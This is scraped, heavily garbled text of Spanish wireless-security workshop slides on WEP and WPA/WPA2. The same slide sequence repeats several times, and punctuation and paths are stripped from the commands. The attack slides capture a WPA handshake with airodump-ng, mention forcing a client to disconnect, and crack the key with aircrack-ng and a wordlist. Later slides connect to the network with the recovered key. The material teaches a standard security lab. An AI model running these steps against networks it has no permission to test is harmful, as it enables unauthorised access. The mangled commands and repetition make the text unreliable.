httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
